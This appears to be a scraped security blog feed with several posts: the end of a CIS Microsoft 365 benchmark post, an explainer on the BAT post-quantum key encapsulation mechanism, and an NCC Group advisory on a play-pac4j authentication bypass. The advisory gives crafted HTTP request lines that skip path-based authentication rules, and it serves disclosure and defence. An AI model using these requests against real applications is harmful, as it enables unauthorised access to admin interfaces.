  • 4.4 Ensure mail transport rules do not whitelist specific domains
  • 5.7 Ensure mail forwarding rules are reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

Conclusions

As you have seen from this post, the newest CIS Microsoft 365 Foundation Benchmarks can not only identify weak points in your tenant’s security, but also offer powerful recommendations to introduce specific mitigations against the most high-impact threats to your Microsoft 365 environment.

References

[1] CIS Microsoft 365 Foundation Benchmark: https://www.cisecurity.org/benchmark/microsoft_365

[2] Microsoft Cyber-Signals: https://news.microsoft.com/wp-content/uploads/prod/sites/626/2022/02/Cyber-Signals-E-1.pdf

[3] Office 365 helps secure Microsoft from modern phishing campaigns: https://www.microsoft.com/en-us/insidetrack/office-365-helps-secure-microsoft-from-modern-phishing-campaigns

[4] Wikipedia Spamming: https://en.wikipedia.org/wiki/Spamming

[5] NCSC: Phishing attacks: defending your organisation: https://www.ncsc.gov.uk/guidance/phishing

[5] Overview of the Azure Active Directory application gallery: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/overview-application-gallery

[6] Azure AD MFA Adaption tweet: https://twitter.com/campuscodi/status/1489647070466170883

BAT: a Fast and Small Key Encapsulation Mechanism

5 April 2023 at 15:40

In this post we present a newly published key encapsulation mechanism (KEM) called BAT. It is a post-quantum algorithm, using NTRU lattices, and its main advantages are that it is both small and fast. The paper was accepted by TCHES (it should appear in volume 2022, issue 2) and is also available on ePrint: https://eprint.iacr.org/2022/031

An implementation (in C, both with and without AVX2 optimizations) is on GitHub: https://github.com/pornin/BAT

What is a Post-Quantum KEM?

Asymmetric cryptography, as used in, for instance, an SSL/TLS connection, classically falls into two categories: digital signatures, and key exchange protocols. The latter designates a mechanism through which two parties send each other messages, and, at the end of the protocol, end up with a shared secret value that they can use to perform further tasks such as symmetric encryption of bulk data. In TLS, the key exchange happens during the initial handshake, along with signatures to convince the client that it is talking to the expected server and none other. A key encapsulation mechanism is a kind of key exchange protocol that can work with only two messages:

  • Party A (the server, in TLS) sends a generic, reusable message that is basically a public key (this message can conceptually be sent in advance and used by many clients, although in TLS servers usually make a new one for each connection, to promote forward secrecy).
  • Party B (the client, in TLS) sends a single message that uses the information from A’s message.

Key encapsulation differs from asymmetric encryption in the following sense: the two parties obtain in fine a shared secret, but neither gets to choose its value; it is an output of the protocol, not an input. The two concepts of KEM and asymmetric encryption are still very close to each other; an asymmetric encryption can be used as a KEM by simply generating a sequence of random bytes and encrypting it with the recipient’s public key, and, conversely, a KEM can be extended into an asymmetric encryption system by adjoining a symmetric encryption algorithm to it to encrypt a message using, as key, the shared secret that is produced by the KEM (when the KEM is Diffie-Hellman, there is even a rarely used standard for that, called IES).

In today’s world, we routinely use KEMs which are fast and small, based on elliptic curve cryptography (specifically, the elliptic curve Diffie-Hellman key exchange). However, tomorrow’s world might feature quantum computers, and a known characteristic of quantum computers is that they can easily break ECDH (as well as older systems such as RSA or classic Diffie-Hellman). There is currently no quantum computer that can do so, and it is unknown whether there will be one in the near future (or ever), but it makes sense to make some provisions for that potential ground-breaking event, that is, to develop some post-quantum algorithms, i.e. cryptographic algorithms that will (presumably) successfully defeat attackers who wield quantum computers.

The NIST has been running for the last few years a standardization process (officially not a competition, though it features candidates and rounds and finalists) that aims at defining a few post-quantum KEMs and signature algorithms. Among the finalists in both categories are algorithms based on lattice cryptography; for KEMs, the two lattice-based algorithms with the “best” performance trade-offs are CRYSTALS-Kyber and Saber.

BAT

BAT is not a candidate to the NIST post-quantum project; it has been just published and that is way too late to enter that process. However, just like standardization of elliptic curve cryptography in the late 1990s (with curves like NIST’s P-256) did not prevent the appearance and wide usage of other curve types (e.g. Curve25519), there is no reason not to keep researching and proposing new schemes with different and sometimes better performance trade-offs. Let us compare some performance measurements for Kyber, Saber and BAT (using the variants that target “NIST level 1” security, i.e. roughly the same as AES-128, and in practice the only one you really need):

AlgorithmKeygen cost
(kilocycles)
Encapsulation
cost (kilocycles)
Decapsulation
cost (kilocycles)
public key
size (bytes)
ciphertext
size (bytes)
Kyber23.636.828.5800768
Saber50.059.057.2672736
BAT2940011.159.7521473
Kyber, Saber and BAT performance on Intel x86 Coffee Lake

These values were all measured on the same system (Intel x86 Coffee Lake, 64-bit, Clang-10.0.0). Let us see what these numbers mean.

First, it is immediately obvious that BAT’s key pair generation is expensive, at close to 30 millions of clock cycles. It is a lot more than for the two other algorithms. However, it is not intolerably expensive; it it still about 10 times faster than RSA key pair generation (for 2048-bit keys), and we have been using RSA for decades. This can still run on small embedded microcontrollers. Key pair generation is, normally, a relatively rare operation. It is quite convenient if key pair generation is very fast, because, for instance, it would allow a busy TLS server to create a new key pair for every incoming connection, which seems best for forward secrecy, but if key pair generation is not so fast, then simply creating a new key pair once every 10 seconds can still provide a fair amount of forward secrecy, at negligible overall cost.

Then we move to encapsulation and decapsulation costs, and we see that BAT encapsulation (the client-side operation, in a TLS model) is very fast, with a cost lower than a third of the cost of Kyber encapsulation, while decapsulation is still on par with that of Saber. We could claim a partial victory here. Does it matter? Not a lot! With costs way lower than a million cycles, everything here is way too fast to have any noticeable impact on a machine such as a laptop, smartphone or server, even if envisioning a very busy server with hundreds of incoming connections per second. Cost may matter for very small systems, such as small microcontrollers working on minimal power, but the figures above are for a big 64-bit x86 CPU with AVX2 optimizations everywhere, which yields very little information on how things would run on a microcontroller (an implementation of BAT optimized for such a small CPU is still a future work at this time).

What really matters here for practical Web-like deployments is the sizes. Public keys and ciphertexts (the two messages of a KEM) travel on the wire, and while networks are fast, exchanges that require extra packets tend to increase latency, an especially sensitive parameter in the case of TLS key exchanges since that happens at the start of the connection, when the human user has clicked on the link is and is waiting for the target site to appear. Human users have very low patience, and it is critical to have as low a latency as possible. Cloudflare has recently run some experiments with post-quantum signature schemes in that area, and it appeared that the size of public keys and signatures of current candidates is a problem. Similar issues impact KEMs as well (though with a lower magnitude because in a TLS handshake, there is a single KEM but typically several signatures and public keys, conveyed in X.509 certificates).

We may also expect size of public keys and ciphertexts to be an important parameter for low-power embedded applications with radio transmission: the energy cost of message transmission is proportional to its size, and is typically much greater than the cost of the computations that produced that message.

We see that BAT offers public key and ciphertext sizes which are significantly lower than those of Kyber and Saber, with savings of about 25 to 40%. This is where BAT shines, and what makes the scheme interesting and worth investigating a bit. Like all new schemes, it shall certainly not be deployed in production! It should first undergo some months (preferably years) of analysis by other researchers. If BAT succeeds at defeating attackers for a few years, then it could become a good candidate for new protocols that need a post-quantum KEM.

The Lattice

Without entering into the fine details of the lattice used by BAT, I am going to try to give an idea about how BAT can achieve lower public key and ciphertext sizes.

Practical lattice-based algorithms tend to work with lattices expressed over a polynomial ring: values are polynomials with coefficients being integers modulo a given integer q (usually small or small-ish, not necessarily a prime), and polynomial computations being made modulo the polynomial Xn+1 with n being a power of 2, often 256, 512 or 1024 (these are convenient cyclotomic polynomials, that allows very fast computations thanks to the number-theoretic transform). Depending on the scheme, there may be one or several such values in a public key and/or a ciphertext. While the internal mechanics differ in their details and even in the exact hard problem they rely on, they tend to have the same kind of trade-off between security, reliability and modulus size.

Indeed, encapsulation can be thought of as injecting a random value as “error bits” in an operation, and decapsulation leverages the private key in order to find the most plausible initial input, before the errors were inserted. Larger errors hide the secret better, but also increase the probability that the decapsulation gets it wrong, i.e. obtains the wrong output in the end. In order to maintain the security level while getting decapsulation error probability so low that it will never happen anywhere in the world, the usual trick is to increase the value of the modulus q. However, a larger q mechanically implies a larger public key and a larger ciphertext, since these are all collections of values modulo q. There are various tricks that can save some bits here and there, but the core principle is that a larger q is a problem and an algorithm designer wants to have q as small as possible.

Saber uses q = 8192. Kyber uses q = 3329. In BAT, q = 257. This is why BAT keys and ciphertexts are smaller.

How does BAT cope with the smaller q? In a nutshell, it has an enhanced decapsulation mechanism that “gets it right” more often. The BAT lattice is a case of a NTRU lattice with a complete base: the private key consists of (in particular) four polynomials f, g, F and G, with small integer coefficients (not integer modulo q, but plain integers), which are such that gF – fG = q. This is known as the NTRU equation. Polynomials f and g are generated randomly with a given distribution, and finding matching F and G is the reason why the key pair generation of BAT is expensive. This is in fact the same key pair generation as in the signature scheme Falcon, though with slightly smaller internal values, and, I am pleased to report, no floating-point operations anywhere. BAT is completely FPU-free, including in the key pair generation; that should make it quite easier to implement on microcontrollers.

Any (F,G) pair that fulfills the NTRU equation allows some decapsulation to happen, but the error rate is lowest when F and G are smallest. The F and G polynomials are found as an approximate reduction using Babai’s nearest plane algorithm, which would return an “optimal” solution with non-integral coefficients, so the coefficients are rounded and F and G are only somewhat good (they are the smallest possible while still having integers as coefficients). The main idea of BAT is to make “better” F and G by also working part of the decapsulation modulo another prime (64513, in the case of BAT) with an extra polynomial (called w in the paper) that in a way incarnates the “missing decimals” of the coefficients of F and G. These computations are only on the decapsulation side, they don’t impact the public key or ciphertext sizes, but they considerably lower the risk of a decapsulation error, and thereby allow using a much smaller modulus q, which leads to the smaller public keys and ciphertexts.

Next Steps

BAT is still in its infancy and I hope other researchers will be motivated into trying to break it (and, hopefully, fail) and extending it. This is ongoing research. I will also try to make an optimized implementation for a small microcontroller (in the context of the NIST post-quantum project, the usual target is the ARM Cortex M4 CPU; the current C code should compile as is and run successfully, but this should be done and performance measured, and some well-placed assembly routines can most likely reduce costs).

Technical Advisory – play-pac4j Authentication rule bypass

5 April 2023 at 15:40
Vendor: PAC4j
Vendor URL: http://www.pac4j.org/
Versions affected: All versions through 3.0.0 (latest at time of writing)
Author: James Chambers <james.chambers[at]nccgroup[dot]trust>
Advisory URL / CVE Identifier: TBD
Risk: High (an attacker can bypass path-based authentication rules)

Summary

Regular expressions used for path-based authentication by the play-pac4j library are evaluated against the full URI provided in a user’s HTTP request. If a requested URI matches one of these expressions, the associated authentication rule will be applied. These rules are only intended to validate the path and query string section of a URL. If a request URI contains a scheme and authority section, the requested URI will not match these path-based rules, even if the resolved relative path used for routing does. This may allow an attacker to bypass certain path-based authentication rules.

Location

SecurityFilter path-based authentication rules in the Play application configuration file (e.g. conf/application.conf).

Impact

An unauthenticated attacker may be able to access restricted paths in a Play web application, such as an administrator interface.

Details

Consider the following authentication configuration:

pac4j.security.rules = [
  {"/admin(?.*)?" = {
    authorizers = "_authenticated_",
    clients = "SAML2Client"
  }},
  {".*" = {
    authorizers = "_anonymous_"
  }}
]

A typical HTTP request line has the following form:

GET /admin HTTP/1.1

The resulting request.uri checked by the play-pac4j library will be /admin, which will trigger the SAML2 authentication rule.

However, another valid way to specify URLs on the request line is:

GET https://example.com/admin HTTP/1.1

In this case, the request.uri will be https://example.com/admin, while request.path will be /admin. The authentication rule for /admin(?.*)? will be bypassed, while the application still routes the user to /admin.

Another valid way to perform this bypass in the browser is by adding two extra slashes to the path, such as https://example.com///admin. The request looks like:

GET ///admin HTTP/1.1

This URI is interpreted as having a relative scheme, empty authority, and path of /admin. The value of request.uri will be ///admin, while the value of request.path is /admin.

Recommendation

As a temporary mitigation, use a catch-all, high privilege authentication rule to catch all unrecognized paths. This will ensure that any rule bypass does not result in privilege escalation, as the highest level of privilege will be required for access.

Alternatively, replace all SecurityFilter path-based rules with per-action Secure annotations.

Vendor Communication

2017-07-28 - NCC Group sends initial email to vendor asking for security contact
2017-07-28 - Vendor responds and provides a security related email address
2017-08-01 - NCC Group asks for a PGP public key to send the advisory encrypted
2017-08-01 - Vendor provides a PGP public key
2017-08-16 - NCC Group sends a draft of the advisory to the vendor
2017-08-17 - Vendor acknowledges receipt of advisory
2017-08-18 - Vendor confirms vulnerability and asks whom to credit
2017-08-31 - NCC Group asks for bug discoverer to be credited
2017-09-01 - Vendor notes that disclosure to Google groups list was made already
   and that the name will be added to that disclosure
2017-09-01 - NCC Group thanks the vendor and informs them that public disclosure
   will move forward

Thanks to

Jérôme Leleu

Published date: 18 September 2017

❌
❌